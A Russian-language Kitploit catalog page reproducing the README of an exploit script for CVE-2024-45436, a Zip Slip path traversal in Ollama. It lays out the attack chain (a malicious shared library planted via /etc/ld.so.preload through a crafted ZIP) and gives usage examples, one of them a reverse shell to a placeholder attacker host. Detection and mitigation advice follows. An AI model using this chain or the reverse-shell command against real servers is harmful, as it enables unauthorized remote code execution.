Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-45436 — exploit script for CVE-2024-45436 | Kitploit
Инструменты/GitHubGitHub/srcx404/cve-2024-45436
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubsrcx404/cve-2024-45436

CVE-2024-45436

exploit script for CVE-2024-45436

Репозиторий
51 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт для Ollama CVE-2024-45436

Чистая и эффективная реализация эксплойта для уязвимости обхода ZIP-путей в Ollama (CVE-2024-45436). 中文文档:README_CN.md

Описание уязвимости

CVE-2024-45436 — это уязвимость обхода путей (также известная как «Zip Slip») в Ollama до версии 0.1.47. Уязвимость позволяет злоумышленникам записывать файлы в произвольные места файловой системы, используя некорректную проверку путей при извлечении ZIP-файлов.

Недостаток находится в функции extractFromZipFile в файле model.go Ollama, которая извлекает файлы модели. Когда ZIP-файл содержит записи с путями, включающими последовательности обхода каталогов (../), Ollama извлекает эти файлы за пределы целевого каталога, что потенциально позволяет злоумышленнику перезаписать критически важные системные файлы.

Механизм эксплуатации

Данный эксплойт использует уязвимость следующим образом:

  1. Создаёт вредоносный файл общей библиотеки (hook.so), содержащий код выполнения произвольной команды
  2. Упаковывает его в специально сформированный ZIP-файл с записями обхода путей:
    • ../../../../../../../../../../etc/ld.so.preload — Используется для предварительной загрузки пользовательских общих библиотек
    • ../../../../../../../../../../tmp/hook.so — Сама вредоносная общая библиотека
  3. Загружает ZIP-файл через blob API Ollama
  4. Создаёт модель, ссылающуюся на загруженный blob
  5. Запускает выполнение путём запроса эмбеддингов у Ollama

При успешном выполнении полезная нагрузка запускается с теми же правами, что и служба Ollama, потенциально предоставляя удалённое выполнение кода с правами root.

Требования

  • Python 3.6+
  • Требуемые пакеты Python:
    • requests
    • argparse
  • GCC (для компиляции общей библиотеки)
  • Экземпляр Ollama с уязвимостью (до версии 0.1.47), работающий на Linux

Использование

root@kitploit:~
python exp.py <target_url> <command>

Аргументы

  • target_url: URL уязвимого экземпляра Ollama (например, http://example.com:11434)
  • command: Команда, которую нужно выполнить в целевой системе

Опции

  • --no-cleanup: Не удалять временные файлы после эксплуатации (полезно для отладки)

Примеры

Базовое использование:

root@kitploit:~
python exp.py http://target-server:11434 "id > /tmp/pwned"

Обратная оболочка:

root@kitploit:~
python exp.py http://target-server:11434 "bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'"

Отказ от ответственности

Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования безопасности. Несанкционированное использование против систем без явного разрешения незаконно и неэтично. Автор не несёт ответственности за неправильное использование данного программного обеспечения.

Обнаружение

Организации могут определить, уязвимы ли они, следующим образом:

  1. Проверка версии Ollama через /api/version
  2. Поиск неожиданных файлов в /etc/ld.so.preload или /tmp/hook.so
  3. Мониторинг подозрительной активности по созданию моделей

Смягчение последствий

  • Обновите Ollama до версии 0.1.47 или новее
  • Если немедленное обновление невозможно, ограничьте сетевой доступ к конечным точкам API Ollama
  • Запускайте Ollama с минимальными привилегиями, а не от root

Технические подробности

Уязвимость использует некорректную проверку путей в процессе извлечения ZIP-файлов в Ollama. При загрузке модели через API приложение извлекает файлы из ZIP-архива без надлежащей санитизации путей, что позволяет проводить атаки с обходом каталогов.

Файл ld.so.preload используется в Linux для указания общих библиотек, которые должны быть загружены перед всеми остальными. Записывая в этот файл, злоумышленник может гарантировать, что его вредоносная библиотека будет загружена любым новым процессом, фактически захватывая выполнение программы.

Лицензия

Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.

Скачать инструмент